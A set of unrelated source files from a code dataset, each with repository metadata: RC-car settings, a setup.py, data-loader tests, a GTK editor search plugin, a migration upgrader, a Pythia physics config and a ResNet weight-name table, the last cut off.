# This is used to specifiy caffe mode and data file name information from kzpy3.utils2 import time_str from kzpy3.utils2 import opjh from kzpy3.utils2 import print_stars0 from kzpy3.utils2 import print_stars1 import os import numpy as np print_stars0();print(__file__);print_stars1() computer_name = "MR_Unknown" try: computer_name = os.environ["COMPUTER_NAME"] except KeyError: print """********** Please set the environment variable computer_name *********** e.g., export COMPUTER_NAME="Mr_Orange" """ ####################### general car settings ################ # for i in range(1): print('*************' + computer_name + '***********') Direct = 1. Follow = 0. Play = 0. Furtive = 0. Caf = 0.0 Racing = 0.0 Location = 'local' #Smyth_tape' weight_file_path = opjh('pytorch_models','epoch6goodnet') verbose = False use_caffe = True NETWORK = 111 I_ROBOT = 222 who_is_in_charge = I_ROBOT robot_steer = 49 robot_motor = 49 steer_gain = 1.0 motor_gain = 1.0 acc2rd_threshold = 150 PID_min_max = [1.5,2.5] """ gyro_freeze_threshold = 150 acc_freeze_threshold_x = 7 acc_freeze_threshold_y_max = 15 acc_freeze_threshold_y_min = 0 acc_freeze_threshold_z = 7 motor_freeze_threshold = 55 n_avg_IMU = 10 """ gyro_freeze_threshold = 150 acc_freeze_threshold_x = 4 acc_freeze_threshold_y_max = 13 acc_freeze_threshold_y_min = 5 acc_freeze_threshold_z = 2 motor_freeze_threshold = 55 n_avg_IMU = 10 robot_acc2rd_threshold = 10 robot_acc_y_exit_threshold = 0 torch_alt_motor = 59 # ################################################################### ####################### specific car settings ################ # """ if computer_name == 'Mr_Orange': #PID_min_max = [2.,3.] #motor_gain = 1.0 Direct = 1. Follow = 0. Play = 0. Furtive = 0. pass if computer_name == 'Mr_Silver': #motor_gain = 1.0 pass if computer_name == 'Mr_Blue': #PID_min_max = [1.5,2.5] #motor_gain = 1.0 pass if computer_name == 'Mr_Yellow': #PID_min_max = [1,2] #motor_gain = 0.9 Direct = 1. Follow = 0. Play = 0. Furtive = 0. Caf = 0.0 Racing = 0.0 pass if computer_name == 'Mr_Black': #PID_min_max = [1.5,2.5] #motor_gain = 1.0 pass if computer_name == 'Mr_White': #motor_gain = 1.0 pass if computer_name == 'Mr_Teal': #motor_gain = 1.0 pass if computer_name == 'Mr_Audi': #motor_gain = 1.0 pass if computer_name == 'Mr_Purple': #motor_gain = 1.0 pass if computer_name == 'Mr_LightBlue': #motor_gain = 1.0 pass #if computer_name == 'Mr_Blue_Original': # motor_gain = 0.5 # pass """ # ################################################################### # motor_gain = 1.0 # override individual settings if Direct == 1: task = 'direct' elif Play == 1: task = 'play' elif Follow == 1: task = 'follow' elif Furtive == 1: task = 'furtive' elif Racing == 1: task = 'racing' else: assert(False) foldername = '' if Follow == 1: foldername = 'follow_' model_name = weight_file_path.split('/')[-1] if Caf == 1: foldername = foldername + 'caffe2_' + model_name +'_' foldername = foldername + task + '_' foldername = foldername + Location + '_' foldername = foldername + time_str() + '_' foldername = foldername + computer_name """ # ################################################################### # Aruco code parameters ar_params={ 'ar_motor_command' : 49, # This is the resting command for stop 'ar_max_left_steering_angle' : np.deg2rad(-130), 'ar_max_right_steering_angle' : np.deg2rad(130), 'ar_max_left_command' : 100, 'ar_max_right_command' : 0, 'ar_left_range' : 50, 'ar_right_range' : 50, 'ar_min_perceived_distance' : 9999, 'ar_critical_distance' : 0.75, 'ar_stop_distance' : 0.5, 'ar_max_motor' : 70, 'ar_min_motor' : 59, 'ar_override_motor':49, 'ar_override_steer':49 } # Full stop. Backwards is not considered """
fba1184cfd449adefa4e36759c3b17c04ea45157
d8859f10ea5d4eba76230036535cdb22fb6398ba
/setup.py
782c08fac224c86b107d7f2f3546e52e8546af76
[ "MIT" ]
permissive
ebranlard/wiz
322a83b0f97ad53c990cfaf26c182d02008f856a
6dfca8b2711b670229f5b2b3b3e0d7fe0bdea156
refs/heads/master
2021-06-09T17:26:48.478453
2021-06-04T16:29:53
2021-06-04T16:37:04
181,733,068
5
1
null
null
null
null
UTF-8
Python
false
false
323
py
from setuptools import setup, find_packages setup( name='wiz', version='1.0', description='Python library from E. Branlard', url='http://github.com/ebranlard/wiz/', author='Emmanuel Branlard', author_email='[email protected]', license='MIT', packages=find_packages(), zip_safe=False )
86a3adb8a35c843aa7d7252b10b0f4a38d03955b
76e51e96f663dccf9cd0f3b508dcee18996cf41b
/tests/test_Loading.py
78222aafe313c998725b2466b5f4c631c20a5184
[ "MIT" ]
permissive
renaiku/MHWorldData
b8d923765ee00bed08cf4d4c80b6ee88b18da1a9
34cf3e2d7e494e84cb48a8f14813480726019139
refs/heads/master
2020-03-27T22:33:12.411297
2018-09-03T18:41:07
2018-09-03T18:41:07
147,240,998
0
0
MIT
2018-09-03T18:38:14
2018-09-03T18:38:13
null
UTF-8
Python
false
false
2,247
py
import pytest import os import shutil import json from mhdata.io import DataReader def save_json(obj, path): with open(path, 'w') as f: json.dump(obj, f) @pytest.fixture() def loader_mock(tmpdir): "Returns loader pointed to a temporary directory created for the test" return DataReader( data_path=tmpdir, languages=['en', 'ja'] ) def test_load_base_json(loader_mock, basedata): path = loader_mock.get_data_path('base.json') save_json(basedata, path) bmap = loader_mock.load_base_json('base.json') assert len(bmap) == len(basedata), "Expected map and base to match" def test_load_base_json_has_auto_ids(loader_mock, basedata): path = loader_mock.get_data_path('base.json') save_json(basedata, path) bmap = loader_mock.load_base_json('base.json') idval = bmap.id_of('ja', 'test2j') assert idval == 2, "expected auto id to have value 2" def test_load_data_json(loader_mock, basedata, subdata): save_json(basedata, loader_mock.get_data_path('base.json')) save_json(subdata, loader_mock.get_data_path('data.json')) bmap = loader_mock.load_base_json('base.json') datamap = loader_mock.load_data_json(bmap.copy(), 'data.json') assert len(datamap) == len(bmap), "expecting full join" for i in range(1, len(datamap) + 1): bmap_name = bmap[i].name('en') assert datamap[i].name('en') == bmap_name, f"expecting names to match for entry {i}" assert datamap[i]['data'] == bmap_name, "expected data to match the name" def test_load_split_data_map(loader_mock, basedata, subdata): save_json(basedata, loader_mock.get_data_path('base.json')) split_path = loader_mock.get_data_path('split/') os.makedirs(split_path) save_json({ 'test2': subdata['test2']}, os.path.join(split_path, 'split1.json')) save_json({ 'test1': subdata['test1']}, os.path.join(split_path, 'split2.json')) bmap = loader_mock.load_base_json('base.json') datamap = loader_mock.load_split_data_map(bmap, 'split') assert len(datamap) == 2, "expected two entries in the data map" names = [entry.name('en') for entry in datamap.values()] assert names == ['test1', 'test2'], "Expected names to match in basemap order"
b48475f57dc3e7b716dda880d44c0b9842560a1b
d4f3511626be986b557b7ff34f342a771941b9bd
/snaked/plugins/search/__init__.py
c9653724e32079d7eade04d3dc639ba0602d434d
[ "MIT" ]
permissive
bigdrum/snaked
4d78bb313d87973d62e8ee5f2bf23b1fada54e7d
2b8620fec1295fbc735f2c53a554e5f133725cb9
refs/heads/master
2020-12-25T10:15:49.575809
2011-09-09T06:56:06
2011-09-09T06:56:06
null
0
0
null
null
null
null
UTF-8
Python
false
false
12,821
py
author = 'Anton Bobrov<[email protected]>' name = 'Search' desc = 'Searches words in document' import re import weakref import gtk import glib from snaked.util import idle, refresh_gui active_widgets = weakref.WeakKeyDictionary() search_selections = [] mark_task_is_in_queue = [False] class SearchSelection(object): def __init__(self, search): self.search = search def init(manager): manager.add_shortcut('search', '<ctrl>f', 'Edit', 'Search or mark', search) manager.add_shortcut('find-next', '<ctrl>j', 'Edit', 'Find next', find_next) manager.add_shortcut('find-prev', '<ctrl>k', 'Edit', 'Find prev', find_prev) manager.add_shortcut('mark-selection', '<ctrl>h', 'Edit', 'Mark selection occurrences', mark_selection) manager.add_global_option('SEARCH_IGNORE_CASE', False, 'Ignore case while searching') manager.add_global_option('SEARCH_REGEX', False, 'Use regular expression for searhing') def search(editor): if editor in active_widgets: widget = active_widgets[editor] else: widget = create_widget(editor) active_widgets[editor] = widget editor.widget.pack_start(widget, False) editor.push_escape(hide, widget) widget.show_all() if editor.buffer.get_has_selection(): start, end = editor.buffer.get_selection_bounds() if start.get_line() == end.get_line(): refresh_gui() search = start.get_text(end) if widget.regex.get_active(): search = re.escape(search) editor.buffer.place_cursor(start) widget.entry.set_text(search) else: widget.entry.grab_focus() else: widget.entry.grab_focus() def backward_search(matcher, text, endpos): match = None for m in matcher.finditer(text): if m.end() > endpos: return match match = m return match def do_find(editor, dir, start_from=None): if editor in active_widgets: search = active_widgets[editor].entry.get_text() ignore_case = active_widgets[editor].ignore_case.get_active() regex = active_widgets[editor].regex.get_active() elif search_selections: search = search_selections[0].search ignore_case = False regex = False else: return matcher = get_matcher(editor, search, ignore_case, regex) if not matcher: return iter = start_from if not iter: if editor.buffer.get_has_selection() and dir == 1: iter = editor.buffer.get_iter_at_mark(editor.buffer.get_selection_bound()) else: iter = editor.cursor match = None if dir == 0: match = matcher.search(editor.utext, iter.get_offset()) else: match = backward_search(matcher, editor.utext, iter.get_offset()) if match: bounds = map(editor.buffer.get_iter_at_offset, match.span()) editor.buffer.select_range(bounds[1], bounds[0]) editor.view.scroll_mark_onscreen(editor.buffer.get_insert()) if start_from: editor.message('Wrap search', 800) return True elif not start_from: return do_find(editor, dir, editor.buffer.get_bounds()[dir]) else: editor.message('Text not found') return False def find_prev(editor): do_find(editor, 1) def find_next(editor, grab_focus=False): if do_find(editor, 0) and grab_focus: editor.view.grab_focus() def create_widget(editor): widget = gtk.HBox(False, 10) widget.set_border_width(3) label = gtk.Label() label.set_text('_Search:') label.set_use_underline(True) widget.pack_start(label, False) entry = gtk.Entry() widget.pack_start(entry, False) widget.entry = entry label.set_mnemonic_widget(entry) entry.connect('activate', on_search_activate, editor, widget) entry.connect_after('changed', on_search_changed, editor, widget) label = gtk.Label() label.set_text('_Replace:') label.set_use_underline(True) widget.pack_start(label, False) entry = gtk.Entry() widget.pack_start(entry, False) widget.replace_entry = entry label.set_mnemonic_widget(entry) entry.connect('activate', on_search_activate, editor, widget) cb = gtk.CheckButton('Ignore _case') cb.set_active(editor.snaked_conf['SEARCH_IGNORE_CASE']) widget.pack_start(cb, False) widget.ignore_case = cb cb = gtk.CheckButton('Rege_x') cb.set_active(editor.snaked_conf['SEARCH_REGEX']) widget.pack_start(cb, False) widget.regex = cb label = gtk.Label('Re_place') label.set_use_underline(True) label.set_padding(10, 1) button = gtk.Button() button.add(label) widget.pack_start(button, False) button.connect('clicked', on_replace_activate, editor, widget) label = gtk.Label('Replace _all') label.set_use_underline(True) label.set_padding(10, 1) button = gtk.Button() button.add(label) widget.pack_start(button, False) button.connect('clicked', on_replace_all_activate, editor, widget) widget.replace_all = button editor.view.connect_after('move-cursor', on_editor_view_move_cursor, widget) widget.replace_in_selection = False return widget def get_tag(editor): table = editor.buffer.get_tag_table() tag = table.lookup('search') if not tag: tag = editor.buffer.create_tag('search') style = editor.buffer.get_style_scheme().get_style('search-match') if style: if style.props.background_set: tag.props.background = style.props.background if style.props.foreground_set: tag.props.foreground = style.props.foreground else: style = editor.buffer.get_style_scheme().get_style('text') if style.props.background_set: tag.props.foreground = style.props.background if style.props.foreground_set: tag.props.background = style.props.foreground return tag def delete_all_marks(editor): start, end = editor.buffer.get_bounds() if editor.buffer.get_tag_table().lookup('search'): editor.buffer.remove_tag_by_name('search', start, end) def get_matcher(editor, search, ignore_case, regex, show_feedback=True): flags = re.UNICODE if ignore_case: flags |= re.IGNORECASE if regex: try: return re.compile(unicode(search), flags) except Exception, e: if show_feedback: editor.message('Bad regex: ' + str(e), 3000) if editor in active_widgets: idle(active_widgets[editor].entry.grab_focus) return None else: return re.compile(re.escape(unicode(search)), flags) def add_mark_task(editor, search, ignore_case, regex, show_feedback=True): if not mark_task_is_in_queue[0]: mark_task_is_in_queue[0] = True idle(mark_occurences, editor, search, ignore_case, regex, show_feedback, priority=glib.PRIORITY_LOW) def mark_occurences(editor, search, ignore_case, regex, show_feedback=True): mark_task_is_in_queue[0] = False matcher = get_matcher(editor, search, ignore_case, regex, show_feedback) if not matcher: return False count = 0 for m in matcher.finditer(editor.utext): editor.buffer.apply_tag(get_tag(editor), *map(editor.buffer.get_iter_at_offset, m.span())) count += 1 if count == 1: if show_feedback: idle(editor.message, 'One occurrence is marked') elif count > 1: if show_feedback: idle(editor.message, '%d occurrences are marked' % count) else: if show_feedback: idle(editor.message, 'Text not found') return False return True def on_search_activate(sender, editor, widget): delete_all_marks(editor) editor.add_spot() if mark_occurences(editor, widget.entry.get_text(), widget.ignore_case.get_active(), widget.regex.get_active()): find_next(editor, True) def on_search_changed(sender, editor, widget): search = widget.entry.get_text() idle(delete_all_marks, editor) if search and ( len(search) != 1 or ( not search.isdigit() and not search.isalpha() and not search.isspace() ) ): idle(add_mark_task, editor, search, widget.ignore_case.get_active(), widget.regex.get_active(), False) def hide(editor, widget): delete_all_marks(editor) try: del active_widgets[editor] except KeyError: pass if widget and widget.get_parent(): editor.widget.remove(widget) widget.destroy() editor.snaked_conf['SEARCH_IGNORE_CASE'] = widget.ignore_case.get_active() editor.snaked_conf['SEARCH_REGEX'] = widget.regex.get_active() editor.view.grab_focus() def mark_selection(editor): if not editor.buffer.get_has_selection(): editor.message('Select something') return if search_selections: search_selections[:] = [] delete_all_marks(editor) occur = SearchSelection(editor.buffer.get_text(*editor.buffer.get_selection_bounds())) search_selections.append(occur) def remove_all(editor, occur): search_selections[:] = [] delete_all_marks(editor) mark_occurences(editor, occur.search, False, False) editor.push_escape(remove_all, occur) def on_replace_activate(button, editor, widget): if editor not in active_widgets: return search = active_widgets[editor].entry.get_text() ignore_case = active_widgets[editor].ignore_case.get_active() regex = active_widgets[editor].regex.get_active() replace = unicode(active_widgets[editor].replace_entry.get_text()) matcher = get_matcher(editor, search, ignore_case, regex) if not matcher: return if editor.buffer.get_has_selection(): iter = editor.buffer.get_selection_bounds()[0] else: iter = editor.cursor match = matcher.search(editor.utext, iter.get_offset()) if not match: editor.message('Replace what?') return start, end = map(editor.buffer.get_iter_at_offset, match.span()) editor.buffer.begin_user_action() editor.buffer.place_cursor(start) editor.buffer.delete(start, end) editor.buffer.insert_at_cursor(match.expand(replace).encode('utf-8')) editor.buffer.end_user_action() editor.view.scroll_mark_onscreen(editor.buffer.get_insert()) def on_replace_all_activate(button, editor, widget): if editor not in active_widgets: return search = active_widgets[editor].entry.get_text() ignore_case = active_widgets[editor].ignore_case.get_active() regex = active_widgets[editor].regex.get_active() replace = unicode(active_widgets[editor].replace_entry.get_text()) matcher = get_matcher(editor, search, ignore_case, regex) if not matcher: return line, offset = editor.cursor.get_line(), editor.cursor.get_line_offset() if active_widgets[editor].replace_in_selection: start, end = editor.buffer.get_selection_bounds() start.order(end) else: start, end = editor.buffer.get_bounds() end_mark = editor.buffer.create_mark(None, end) editor.buffer.begin_user_action() editor.buffer.place_cursor(start) count = 0 while True: match = matcher.search(editor.utext, editor.cursor.get_offset()) if not match: break start, end = map(editor.buffer.get_iter_at_offset, match.span()) if end.compare(editor.buffer.get_iter_at_mark(end_mark)) > 0: break editor.buffer.place_cursor(start) editor.buffer.delete(start, end) editor.buffer.insert_at_cursor(match.expand(replace).encode('utf-8')) count += 1 editor.buffer.end_user_action() if not count: editor.message('Nothing to replace') elif count == 1: editor.message('One occurrence was replaced') else: editor.message('%d occurrences were replaced' % count) cursor = editor.cursor cursor.set_line(line) cursor.set_line_offset(offset) editor.buffer.place_cursor(cursor) editor.view.scroll_mark_onscreen(editor.buffer.get_insert()) editor.view.grab_focus() def on_editor_view_move_cursor(view, step, count, selection, widget): if selection: r = view.get_buffer().get_selection_bounds() new_state = r and r[0].get_line() != r[1].get_line() else: new_state = False if widget.replace_in_selection != new_state: widget.replace_in_selection = new_state if new_state: widget.replace_all.set_label("Replace in se_lection") else: widget.replace_all.set_label("Replace _all")
12c43770a03fa2dd6d1279173deb78335d2ff25a
a6a52013708c5242ea737950a7614e5585c0b1ae
/oot/upgrade/upgrade.py
47b18fbdbc1987f0f4df408fc3bb368c4bf7d6be
[]
no_license
tegin/oot
b381ce32686965cbb7979ee44856b1f9695d23d9
36d372939dc5bbe65eb7106746f747a87ea29a69
refs/heads/prod
2021-07-06T05:09:55.472203
2019-11-15T12:36:21
2019-11-15T12:36:21
216,402,597
5
5
null
2019-11-18T08:28:31
2019-10-20T17:47:45
Python
UTF-8
Python
false
false
1,220
py
import importlib.util import logging import os import pip._internal.main as pip from packaging import version as packaging_version _logger = logging.getLogger(__name__) def upgrade(current_version, version, path, migration_package): if current_version >= version: return False if os.path.exists(os.path.join(path, "requirements.txt")): pass pip.main(["install", "-r", os.path.join(path, "requirements.txt"), "--upgrade"]) migration_path = migration_package.__path__._path[0] migrations = [] for vers in os.listdir(migration_path): migration_version = packaging_version.parse(vers) if migration_version <= version and migration_version > current_version: migrations.append(migration_version) migrations = sorted(migrations) for migration in migrations: spec = importlib.util.spec_from_file_location( "migration", os.path.join(migration_path, migration.base_version, "migration.py"), ) module = importlib.util.module_from_spec(spec) spec.loader.exec_module(module) _logger.info("Executing migration for %s" % migration.base_version) module.migrate() return True
3e2d53619ad1a420b81849bc407d615f9aa85874
0fccee4c738449f5e0a8f52ea5acabf51db0e910
/genfragments/EightTeV/TprimeTprime/TprimeTprimeToTZBWinc_M_625_TuneZ2star_8TeV-madgraph_cff.py
0074af204c51e90e60f3bb535520fed0d2b05427
[]
no_license
cms-sw/genproductions
f308ffaf3586c19b29853db40e6d662e937940ff
dd3d3a3826343d4f75ec36b4662b6e9ff1f270f4
refs/heads/master
2023-08-30T17:26:02.581596
2023-08-29T14:53:43
2023-08-29T14:53:43
11,424,867
69
987
null
2023-09-14T12:41:28
2013-07-15T14:18:33
Python
UTF-8
Python
false
false
5,074
py
import FWCore.ParameterSet.Config as cms #from Configuration.Generator.PythiaUEZ2Settings_cfi import * from Configuration.Generator.PythiaUEZ2starSettings_cfi import * generator = cms.EDFilter("Pythia6HadronizerFilter", pythiaHepMCVerbosity = cms.untracked.bool(False), maxEventsToPrint = cms.untracked.int32(0), pythiaPylistVerbosity = cms.untracked.int32(0), comEnergy = cms.double(8000.0), PythiaParameters = cms.PSet( pythiaUESettingsBlock, processParameters = cms.vstring( 'MSTP(1) = 4', 'MSEL=8 ! fourth generation (t4) fermions', 'MWID(8)=2', 'MSTJ(1)=1 ! Fragmentation/hadronization on or off', 'MSTP(61)=1 ! Parton showering on or off', 'PMAS(5,1)=4.8 ! b quark mass', #from Spring11 4000040 'PMAS(6,1)=172.5 ! t quark mass', #from Spring11 4000040 'PMAS(8,1) = 625.0D0 ! tprime quarks mass', 'PMAS(8,2) = 6.25D0', 'PMAS(8,3) = 62.5D0', 'VCKM(1,1) = 0.97414000D0', 'VCKM(1,2) = 0.22450000D0', 'VCKM(1,3) = 0.00420000D0', 'VCKM(1,4) = 0.02500000D0', 'VCKM(2,1) = 0.22560000D0', 'VCKM(2,2) = 0.97170000D0', 'VCKM(2,3) = 0.04109000D0', 'VCKM(2,4) = 0.05700000D0', 'VCKM(3,1) = 0.00100000D0', 'VCKM(3,2) = 0.06200000D0', 'VCKM(3,3) = 0.91000000D0', 'VCKM(3,4) = 0.41000000D0', 'VCKM(4,1) = 0.01300000D0', 'VCKM(4,2) = 0.04000000D0', 'VCKM(4,3) = 0.41000000D0', 'VCKM(4,4) = 0.91000000D0', 'MDME(66,1)=0 ! g t4', 'MDME(67,1)=0 ! gamma t4', 'KFDP(68,2)=6 ! defines Z0 t (no check)', 'MDME(68,1)=1 ! Z0 t (2 : on for particle, off for anti-particle) ', 'MDME(69,1)=0 ! W d', 'MDME(70,1)=0 ! W s', 'MDME(71,1)=1 ! W b (3 : off for particle, on for particle) ', 'MDME(72,1)=0 ! W b4', 'MDME(73,1)=0 ! h0 t4', 'MDME(74,1)=-1 ! H+ b', 'MDME(75,1)=-1 ! H+ b4', 'BRAT(66) = 0.0D0', 'BRAT(67) = 0.0D0', 'BRAT(68) = 0.5D0', 'BRAT(69) = 0.0D0', 'BRAT(70) = 0.0D0', 'BRAT(71) = 0.5D0', 'BRAT(72) = 0.0D0', 'BRAT(73) = 0.0D0', 'BRAT(74) = 0.0D0', 'BRAT(75) = 0.0D0', 'MDME(174,1)=1 !Z decay into d dbar', 'MDME(175,1)=1 !Z decay into u ubar', 'MDME(176,1)=1 !Z decay into s sbar', 'MDME(177,1)=1 !Z decay into c cbar', 'MDME(178,1)=1 !Z decay into b bbar', 'MDME(179,1)=1 !Z decay into t tbar', 'MDME(180,1)=-1 !Z decay into b4 b4bar', 'MDME(181,1)=-1 !Z decay into t4 t4bar', 'MDME(182,1)=1 !Z decay into e- e+', 'MDME(183,1)=1 !Z decay into nu_e nu_ebar', 'MDME(184,1)=1 !Z decay into mu- mu+', 'MDME(185,1)=1 !Z decay into nu_mu nu_mubar', 'MDME(186,1)=1 !Z decay into tau- tau+', 'MDME(187,1)=1 !Z decay into nu_tau nu_taubar', 'MDME(188,1)=-1 !Z decay into tau4 tau4bar', 'MDME(189,1)=-1 !Z decay into nu_tau4 nu_tau4bar', 'MDME(190,1)=1 !W decay into u dbar', 'MDME(191,1)=1 !W decay into c dbar', 'MDME(192,1)=1 !W decay into t dbar', 'MDME(193,1)=-1 !W decay into t4 dbar', 'MDME(194,1)=1 !W decay into u sbar', 'MDME(195,1)=1 !W decay into c sbar', 'MDME(196,1)=1 !W decay into t sbar', 'MDME(197,1)=-1 !W decay into t4 sbar', 'MDME(198,1)=1 !W decay into u bbar', 'MDME(199,1)=1 !W decay into c bbar', 'MDME(200,1)=1 !W decay into t bbar', 'MDME(201,1)=-1 !W decay into t4 bbar', 'MDME(202,1)=-1 !W decay into u b4bar', 'MDME(203,1)=-1 !W decay into c b4bar', 'MDME(204,1)=-1 !W decay into t b4bar', 'MDME(205,1)=-1 !W decay into t4 b4bar', 'MDME(206,1)=1 !W decay into e- nu_e', 'MDME(207,1)=1 !W decay into mu nu_mu', 'MDME(208,1)=1 !W decay into tau nu_tau', 'MDME(209,1)=-1 !W decay into tau4 nu_tau4'), # This is a vector of ParameterSet names to be read, in this order parameterSets = cms.vstring('pythiaUESettings', 'processParameters') ), jetMatching = cms.untracked.PSet( scheme = cms.string("Madgraph"), mode = cms.string("auto"), # soup, or "inclusive" / "exclusive" MEMAIN_etaclmax = cms.double(5.0), MEMAIN_qcut = cms.double(-1), MEMAIN_nqmatch = cms.int32(-1), MEMAIN_minjets = cms.int32(-1), MEMAIN_maxjets = cms.int32(-1), MEMAIN_showerkt = cms.double(0), MEMAIN_excres = cms.string(''), outTree_flag = cms.int32(0) ) ) ProductionFilterSequence = cms.Sequence(generator)
1ef6abb1dc8514a3821f1e914f36edb9afe6191c
14aa5e3974f9857b58a4a06ebf42dc348e2ab6ae
/severstal-steel-defect-detection/20190910/code/dummy_11a/resnet18_unet_softmax_01/resnet.py
66efd98d79b56664cb2de700a77c9f360ef051b9
[]
no_license
alimbekovKZ/jupyter_notebooks_2
b729e6a16210d0117ff9fb563c83d39f59a906e4
a925fb3adcf675e8a9a9eb4bae472a38df15fd28
refs/heads/master
2023-02-10T08:56:15.435965
2021-01-05T10:10:20
2021-01-05T10:10:20
266,936,671
1
0
null
null
null
null
UTF-8
Python
false
false
16,282
py
from common import * from lib.net.sync_bn.nn import BatchNorm2dSync as SynchronizedBatchNorm2d BatchNorm2d = SynchronizedBatchNorm2d #BatchNorm2d = nn.BatchNorm2d IMAGE_RGB_MEAN = [0.485, 0.456, 0.406] IMAGE_RGB_STD = [0.229, 0.224, 0.225] ############################################################################### CONVERSION=[ 'block0.0.weight', (64, 3, 7, 7), 'conv1.weight', (64, 3, 7, 7), 'block0.1.weight', (64,), 'bn1.weight', (64,), 'block0.1.bias', (64,), 'bn1.bias', (64,), 'block0.1.running_mean', (64,), 'bn1.running_mean', (64,), 'block0.1.running_var', (64,), 'bn1.running_var', (64,), 'block1.1.conv_bn1.conv.weight', (64, 64, 3, 3), 'layer1.0.conv1.weight', (64, 64, 3, 3), 'block1.1.conv_bn1.bn.weight', (64,), 'layer1.0.bn1.weight', (64,), 'block1.1.conv_bn1.bn.bias', (64,), 'layer1.0.bn1.bias', (64,), 'block1.1.conv_bn1.bn.running_mean', (64,), 'layer1.0.bn1.running_mean', (64,), 'block1.1.conv_bn1.bn.running_var', (64,), 'layer1.0.bn1.running_var', (64,), 'block1.1.conv_bn2.conv.weight', (64, 64, 3, 3), 'layer1.0.conv2.weight', (64, 64, 3, 3), 'block1.1.conv_bn2.bn.weight', (64,), 'layer1.0.bn2.weight', (64,), 'block1.1.conv_bn2.bn.bias', (64,), 'layer1.0.bn2.bias', (64,), 'block1.1.conv_bn2.bn.running_mean', (64,), 'layer1.0.bn2.running_mean', (64,), 'block1.1.conv_bn2.bn.running_var', (64,), 'layer1.0.bn2.running_var', (64,), 'block1.2.conv_bn1.conv.weight', (64, 64, 3, 3), 'layer1.1.conv1.weight', (64, 64, 3, 3), 'block1.2.conv_bn1.bn.weight', (64,), 'layer1.1.bn1.weight', (64,), 'block1.2.conv_bn1.bn.bias', (64,), 'layer1.1.bn1.bias', (64,), 'block1.2.conv_bn1.bn.running_mean', (64,), 'layer1.1.bn1.running_mean', (64,), 'block1.2.conv_bn1.bn.running_var', (64,), 'layer1.1.bn1.running_var', (64,), 'block1.2.conv_bn2.conv.weight', (64, 64, 3, 3), 'layer1.1.conv2.weight', (64, 64, 3, 3), 'block1.2.conv_bn2.bn.weight', (64,), 'layer1.1.bn2.weight', (64,), 'block1.2.conv_bn2.bn.bias', (64,), 'layer1.1.bn2.bias', (64,), 'block1.2.conv_bn2.bn.running_mean', (64,), 'layer1.1.bn2.running_mean', (64,), 'block1.2.conv_bn2.bn.running_var', (64,), 'layer1.1.bn2.running_var', (64,), 'block2.0.conv_bn1.conv.weight', (128, 64, 3, 3), 'layer2.0.conv1.weight', (128, 64, 3, 3), 'block2.0.conv_bn1.bn.weight', (128,), 'layer2.0.bn1.weight', (128,), 'block2.0.conv_bn1.bn.bias', (128,), 'layer2.0.bn1.bias', (128,), 'block2.0.conv_bn1.bn.running_mean', (128,), 'layer2.0.bn1.running_mean', (128,), 'block2.0.conv_bn1.bn.running_var', (128,), 'layer2.0.bn1.running_var', (128,), 'block2.0.conv_bn2.conv.weight', (128, 128, 3, 3), 'layer2.0.conv2.weight', (128, 128, 3, 3), 'block2.0.conv_bn2.bn.weight', (128,), 'layer2.0.bn2.weight', (128,), 'block2.0.conv_bn2.bn.bias', (128,), 'layer2.0.bn2.bias', (128,), 'block2.0.conv_bn2.bn.running_mean', (128,), 'layer2.0.bn2.running_mean', (128,), 'block2.0.conv_bn2.bn.running_var', (128,), 'layer2.0.bn2.running_var', (128,), 'block2.0.shortcut.conv.weight', (128, 64, 1, 1), 'layer2.0.downsample.0.weight', (128, 64, 1, 1), 'block2.0.shortcut.bn.weight', (128,), 'layer2.0.downsample.1.weight', (128,), 'block2.0.shortcut.bn.bias', (128,), 'layer2.0.downsample.1.bias', (128,), 'block2.0.shortcut.bn.running_mean', (128,), 'layer2.0.downsample.1.running_mean', (128,), 'block2.0.shortcut.bn.running_var', (128,), 'layer2.0.downsample.1.running_var', (128,), 'block2.1.conv_bn1.conv.weight', (128, 128, 3, 3), 'layer2.1.conv1.weight', (128, 128, 3, 3), 'block2.1.conv_bn1.bn.weight', (128,), 'layer2.1.bn1.weight', (128,), 'block2.1.conv_bn1.bn.bias', (128,), 'layer2.1.bn1.bias', (128,), 'block2.1.conv_bn1.bn.running_mean', (128,), 'layer2.1.bn1.running_mean', (128,), 'block2.1.conv_bn1.bn.running_var', (128,), 'layer2.1.bn1.running_var', (128,), 'block2.1.conv_bn2.conv.weight', (128, 128, 3, 3), 'layer2.1.conv2.weight', (128, 128, 3, 3), 'block2.1.conv_bn2.bn.weight', (128,), 'layer2.1.bn2.weight', (128,), 'block2.1.conv_bn2.bn.bias', (128,), 'layer2.1.bn2.bias', (128,), 'block2.1.conv_bn2.bn.running_mean', (128,), 'layer2.1.bn2.running_mean', (128,), 'block2.1.conv_bn2.bn.running_var', (128,), 'layer2.1.bn2.running_var', (128,), 'block3.0.conv_bn1.conv.weight', (256, 128, 3, 3), 'layer3.0.conv1.weight', (256, 128, 3, 3), 'block3.0.conv_bn1.bn.weight', (256,), 'layer3.0.bn1.weight', (256,), 'block3.0.conv_bn1.bn.bias', (256,), 'layer3.0.bn1.bias', (256,), 'block3.0.conv_bn1.bn.running_mean', (256,), 'layer3.0.bn1.running_mean', (256,), 'block3.0.conv_bn1.bn.running_var', (256,), 'layer3.0.bn1.running_var', (256,), 'block3.0.conv_bn2.conv.weight', (256, 256, 3, 3), 'layer3.0.conv2.weight', (256, 256, 3, 3), 'block3.0.conv_bn2.bn.weight', (256,), 'layer3.0.bn2.weight', (256,), 'block3.0.conv_bn2.bn.bias', (256,), 'layer3.0.bn2.bias', (256,), 'block3.0.conv_bn2.bn.running_mean', (256,), 'layer3.0.bn2.running_mean', (256,), 'block3.0.conv_bn2.bn.running_var', (256,), 'layer3.0.bn2.running_var', (256,), 'block3.0.shortcut.conv.weight', (256, 128, 1, 1), 'layer3.0.downsample.0.weight', (256, 128, 1, 1), 'block3.0.shortcut.bn.weight', (256,), 'layer3.0.downsample.1.weight', (256,), 'block3.0.shortcut.bn.bias', (256,), 'layer3.0.downsample.1.bias', (256,), 'block3.0.shortcut.bn.running_mean', (256,), 'layer3.0.downsample.1.running_mean', (256,), 'block3.0.shortcut.bn.running_var', (256,), 'layer3.0.downsample.1.running_var', (256,), 'block3.1.conv_bn1.conv.weight', (256, 256, 3, 3), 'layer3.1.conv1.weight', (256, 256, 3, 3), 'block3.1.conv_bn1.bn.weight', (256,), 'layer3.1.bn1.weight', (256,), 'block3.1.conv_bn1.bn.bias', (256,), 'layer3.1.bn1.bias', (256,), 'block3.1.conv_bn1.bn.running_mean', (256,), 'layer3.1.bn1.running_mean', (256,), 'block3.1.conv_bn1.bn.running_var', (256,), 'layer3.1.bn1.running_var', (256,), 